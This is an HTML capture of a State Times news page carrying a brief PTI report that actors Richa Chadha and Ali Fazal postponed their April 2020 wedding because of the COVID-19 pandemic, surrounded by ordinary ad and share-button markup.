    <meta itemprop="url" content="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg&h=300&w=300">
    <meta itemprop="width" content="300">
    <meta itemprop="height" content="300">
  </div>
  <meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/"/>

  <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
    <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
      <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg">
      <meta itemprop="width" content="445">
      <meta itemprop="height" content="77">
    </div>
        <meta itemprop="name" content="State Times">
  </div>
  <meta itemprop="datePublished" content="2020-03-19T11:44:29+05:30"/>
  <meta itemprop="dateModified" content="2020-03-19T11:44:41+05:30"/>

<h1 class="post-tile entry-title" itemprop="headline">Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare</h1>
<div class="mom-post-meta single-post-meta"><span>on: <time datetime="2020-03-19T11:44:29+05:30" class="updated">March 19, 2020</time></span><span>In: <a href="http://news.statetimes.in/section/entertainment/bollywod/" title="View all posts in Bollywood">Bollywood</a>, <a href="http://news.statetimes.in/section/entertainment/" title="View all posts in Entertainment">Entertainment</a>, <a href="http://news.statetimes.in/section/news/imp-today/" title="View all posts in Latest News">Latest News</a></span><span>Tags: </span><span><a href="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/#respond">No Comments</a></span><div class="post-tools"><a href="javascript:window.print()" rel="nofollow" class="print"><i class="fa-icon-print"> </i>Print</a><a href="mailto:?subject=Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare&body=Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/" rel="nofollow" class="email"><i class="fa-icon-envelope"> </i>Email</a></div></div><div class="entry-content">
               <div class="mom-social-share ss-horizontal border-box php-share" data-id="595821">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare&url=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/&title=Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg&#038;h=1024&#038;w=1024&amp;
url=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/&amp;
is_video=false&amp;description=Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

<br>    
<p>Mumbai: Actors Richa Chadha and Ali Fazal have postponed their wedding to later half of the year amid the coronavirus pandemic, the spokesperson for the couple announced on Thursday.</p>



<div class="wp-block-image"><figure class="aligncenter size-large"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg?x28364" alt="" class="wp-image-595834 lazy" data-srcset="http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg 400w, http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare-300x158.jpg 300w" data-sizes="(max-width: 400px) 100vw, 400px" /></figure></div>



<p>Richa and Ali were scheduled to tie the knot in April, with reportedly many of their guests flying in from the US and Europe for the ceremony.</p>



<p>&#8220;Given the current scenario and the unfortunate turn of events owing to the COVID-19 pandemic globally, Ali Fazal and Richa Chadha have decided to postpone their wedding functions to the later half of 2020 tentatively.</p>



<p>&#8220;They wish for everyone to be healthy and safe and at no cost would want their friends, families and well wishers to be affected,&#8221; the spokesperson for the actors said in a statement.</p>



<p>The number of novel coronavirus cases in India rose to 169 on Thursday.</p>



<p>The pandemic has led to the cancellation of various events, award functions, interviews and shooting schedules in the country. To contain the spread of the novel coronavirus, film bodies in India decided to put shootings of films, TV shows and web series on hold till March 31. (PTI)</p>
      

    
		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-834 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-834 .mom-e3lanat-inner').boxSlider({
				autoScroll: false,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-834 .adr-next',
				prev: '.e3lanat-rotator-id-834 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-834" style="width:320px; height:100px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="8540" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- mobile one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:320px;height:100px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="6339736216"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
       <div class="mom-social-share ss-horizontal border-box php-share" data-id="595821">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare&url=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/&title=Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg&#038;h=1024&#038;w=1024&amp;
url=http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/&amp;
is_video=false&amp;description=Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

</div> <!-- entry content -->
</div> <!-- base box -->

            <div class="np-posts">
                <ul>
			                    <li class="np-post prev border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/icse-board-class-1012-exams-postponed-till-march-31/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/ICSE-board-class-1012-exams-postponed-till-March-31.jpg&h=60&w=90" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/ICSE-board-class-1012-exams-postponed-till-March-31.jpg&h=120&w=180" alt="Richa Chadha-Ali Fazal's wedding delayed amid coronavirus scare"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/icse-board-class-1012-exams-postponed-till-march-31/" class="link prev"><i class="fa-icon-double-angle-left"></i>Previous</a>
                            <h3><a href="http://news.statetimes.in/icse-board-class-1012-exams-postponed-till-march-31/">ICSE board class 10,12 exams postponed till March 31</a></h3>
                        </div>
                    </li>
		    		                        <li class="np-post next border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/we-are-all-in-this-together-finch-on-possible-financial-losses-due-to-covid-19/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2018/07/Australias-Finch-sets-Surrey-record-with-T20-ton.jpg&h=60&w=90" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2018/07/Australias-Finch-sets-Surrey-record-with-T20-ton.jpg&h=120&w=180" alt="Richa Chadha-Ali Fazal's wedding delayed amid coronavirus scare"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/we-are-all-in-this-together-finch-on-possible-financial-losses-due-to-covid-19/" class="link next"><i class="fa-icon-double-angle-right alignright"></i>Next</a>
                            <h3><a href="http://news.statetimes.in/we-are-all-in-this-together-finch-on-possible-financial-losses-due-to-covid-19/">We are all in this together: Finch on possible financial losses due to COVID-19</a></h3>
                        </div>
                    </li>
		                    </ul>
            </div> <!-- np posts -->
		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="322174" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4609961952"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                <h2 class="single-title">Related Articles</h2>
            <div class="base-box single-box">
                <ul class="single-related-posts">
	   	     	       <li>
			                        <a href="http://news.statetimes.in/china-reports-no-new-domestic-coronavirus-cases-for-first-time/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/02/China-coronavirus-Death-toll-climbs-to-over-2700-amidst-signs-of-slowdown.jpg&h=122&w=190" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/02/China-coronavirus-Death-toll-climbs-to-over-2700-amidst-signs-of-slowdown.jpg&h=380&w=610" alt="China reports no new domestic coronavirus cases for first time"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/china-reports-no-new-domestic-coronavirus-cases-for-first-time/">China reports no new domestic coronavirus cases for first time</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-03-19T11:28:47+05:30">March 19, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/substandard-sanitisers-worth-rs-25-lakh-seized-in-mumbai/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/sanitizers.jpg&h=122&w=190" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/sanitizers.jpg&h=380&w=610" alt="Substandard sanitisers worth Rs 25 lakh seized in Mumbai"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/substandard-sanitisers-worth-rs-25-lakh-seized-in-mumbai/">Substandard sanitisers worth Rs 25 lakh seized in Mumbai</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-03-19T11:15:20+05:30">March 19, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/30-shanties-gutted-in-fire-in-pune-slum-none-hurt/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2019/06/Fire-2.jpg&h=122&w=190" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2019/06/Fire-2.jpg&h=380&w=610" alt="30 shanties gutted in fire in Pune slum, none hurt"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/30-shanties-gutted-in-fire-in-pune-slum-none-hurt/">30 shanties gutted in fire in Pune slum, none hurt</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-03-19T10:32:40+05:30">March 19, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/goair-to-continue-operations-in-mizoram-say-officials/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2016/08/GoAir-to-hire-500-personnel-expand-fleet-to-26-planes.jpg&h=122&w=190" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2016/08/GoAir-to-hire-500-personnel-expand-fleet-to-26-planes.jpg&h=380&w=610" alt="GoAir to continue operations in Mizoram, say officials"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/goair-to-continue-operations-in-mizoram-say-officials/">GoAir to continue operations in Mizoram, say officials</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-03-19T10:32:00+05:30">March 19, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/second-coronavirus-case-reported-in-ap/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Coronavirus-1.jpg&h=122&w=190" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Coronavirus-1.jpg&h=380&w=610" alt="Second coronavirus case reported in AP"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/second-coronavirus-case-reported-in-ap/">Second coronavirus case reported in AP</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-03-19T10:31:52+05:30">March 19, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/covid-19-after-one-person-has-been-detected-positive-in-khanyar-authorities-imposed-restrictions-in-srinagar/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/1-6.jpeg&h=122&w=190" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/1-6.jpeg&h=380&w=610" alt="COVID-19: After one person has been detected positive in Khanyar, authorities imposed restrictions in Srinagar."></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/covid-19-after-one-person-has-been-detected-positive-in-khanyar-authorities-imposed-restrictions-in-srinagar/">COVID-19: After one person has been detected positive in Khanyar, authorities imposed restrictions in Srinagar.</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-03-19T10:18:18+05:30">March 19, 2020</time>
			</div>
                </li>

</ul>
</div>

<div id="comments" class="comments-area">

	
		
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/#respond" style="display:none;">Cancel Reply</a></small></h3><form action="http://news.statetimes.in/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><textarea id="comment" placeholder="Comment..." name="comment" cols="45" rows="8" aria-required="true"></textarea></p><input id="author" name="author" type="text" placeholder="Name (required)" value="" size="30" aria-required='true' />
<input id="email" name="email" type="text" placeholder="Email (required)" value="" size="30" aria-required='true' />
<input id="url" name="url" type="text" placeholder="Website" value="" size="30" />
<p class="form-submit"><input name="submit" type="submit" id="submit-comment" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='595821' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->
            </div> <!--main column-->
                      <div class="sidebar secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-posts_list"><div class="widget-head"><h3 class="widget-title"><span>Latest News</span></h3></div>		<ul>
		
			<li><a href="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/">Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare</a></li>

			
			<li><a href="http://news.statetimes.in/china-reports-no-new-domestic-coronavirus-cases-for-first-time/">China reports no new domestic coronavirus cases for first time</a></li>

			
			<li><a href="http://news.statetimes.in/substandard-sanitisers-worth-rs-25-lakh-seized-in-mumbai/">Substandard sanitisers worth Rs 25 lakh seized in Mumbai</a></li>

			
			<li><a href="http://news.statetimes.in/30-shanties-gutted-in-fire-in-pune-slum-none-hurt/">30 shanties gutted in fire in Pune slum, none hurt</a></li>

			
			<li><a href="http://news.statetimes.in/goair-to-continue-operations-in-mizoram-say-officials/">GoAir to continue operations in Mizoram, say officials</a></li>

			
			<li><a href="http://news.statetimes.in/second-coronavirus-case-reported-in-ap/">Second coronavirus case reported in AP</a></li>

			
			<li><a href="http://news.statetimes.in/covid-19-after-one-person-has-been-detected-positive-in-khanyar-authorities-imposed-restrictions-in-srinagar/">COVID-19: After one person has been detected positive in Khanyar, authorities imposed restrictions in Srinagar.</a></li>

			
			<li><a href="http://news.statetimes.in/covid-19-section-144-imposed-in-baramulla-district/">COVID-19: Section 144 imposed In Baramulla District</a></li>

			
			<li><a href="http://news.statetimes.in/covid-19-jk-govt-asked-people-not-to-circulate-or-believe-in-rumours/">COVID-19: J&#038;K Govt asked people not to circulate or believe in rumours</a></li>

			
			<li><a href="http://news.statetimes.in/employees-exempted-to-mark-biometric-attendance-in-aadhar-based-attendance-system/">Employees exempted to mark Biometric Attendance in Aadhar Based Attendance System</a></li>

			
			<li><a href="http://news.statetimes.in/foreign-tourists-who-arrived-in-srinagar-today-being-sent-back-tomorrow-dc-srinagar/">Foreign tourists who arrived in Srinagar today being sent back tomorrow: DC Srinagar</a></li>

			
			<li><a href="http://news.statetimes.in/forces-busted-a-terrorist-hideout-in-hari-buchoo-area-of-tral-in-pulwama-district-of-south-kashmir-material-to-be-used-for-making-ied-bombs-and-food-items-recovered/">Forces busted a terrorist hideout in Hari Buchoo Area of Tral in Pulwama district of South Kashmir, material to be used for making IED Bombs and food Items recovered</a></li>

			
			<li><a href="http://news.statetimes.in/narcotic-peddler-arrested-17-rolls-of-charas-like-substance-seized/">Narcotic peddler arrested, 17 rolls of Charas like substance seized</a></li>

			
			<li><a href="http://news.statetimes.in/sc-pulls-up-centre-telecos-for-doing-self-assessment-of-agr-dues-fixed-by-court/">SC pulls up Centre, telecos for doing self-assessment of AGR dues fixed by court</a></li>

			
			<li><a href="http://news.statetimes.in/coronavirus-parks-to-remain-close-in-poonch/">Coronavirus: Parks to remain close in Poonch</a></li>

											</ul>
</div>
            </div> <!--main sidebar-->
            <div class="clear"></div>
            <div class="clear"></div>
</div> <!--main container-->            
            <div class="sidebar main-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-ads">		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4677" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sidebar one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5446915816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
</div><div class="widget widget_momizattabber">                        <div class="main_tabs">
                            <ul class="tabs"></ul>
                            <div class="tabs-content-wrap">
                                <div class="tab-content"><a href="#" class="mom-tw-title">Top Stories</a>                                   <div class="mom-posts-widget">

					<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/jk-residents-to-have-rs-5-lakh-free-health-insurance-like-ayushman-bharat/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/LIEUTENANT-GOVERNOR-CHAIRING-STATE-ADMINISTRATIVE-COUNCIL-MEETING-18.jpg&h=60&w=90" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/LIEUTENANT-GOVERNOR-CHAIRING-STATE-ADMINISTRATIVE-COUNCIL-MEETING-18.jpg&h=60&w=90" alt="J&K residents to have Rs 5 lakh free Health Insurance like Ayushman Bharat" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/jk-residents-to-have-rs-5-lakh-free-health-insurance-like-ayushman-bharat/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/LIEUTENANT-GOVERNOR-CHAIRING-STATE-ADMINISTRATIVE-COUNCIL-MEETING-18.jpg&h=120&w=180" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/LIEUTENANT-GOVERNOR-CHAIRING-STATE-ADMINISTRATIVE-COUNCIL-MEETING-18.jpg&h=120&w=180" alt="J&K residents to have Rs 5 lakh free Health Insurance like Ayushman Bharat" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/jk-residents-to-have-rs-5-lakh-free-health-insurance-like-ayushman-bharat/">J&#038;K residents to have Rs 5 lakh free Health Insurance like Ayushman Bharat</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:36:55+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/teaching-staff-of-udhampur-rajouri-allowed-remaining-off-duty/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Teaching staff of Udhampur, Rajouri allowed remaining off duty" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/teaching-staff-of-udhampur-rajouri-allowed-remaining-off-duty/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Teaching staff of Udhampur, Rajouri allowed remaining off duty" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/teaching-staff-of-udhampur-rajouri-allowed-remaining-off-duty/">Teaching staff of Udhampur, Rajouri allowed remaining off duty</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:36:51+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/two-terrorist-hideouts-busted-in-kashmir/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Two terrorist hideouts busted in Kashmir" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/two-terrorist-hideouts-busted-in-kashmir/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Two terrorist hideouts busted in Kashmir" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
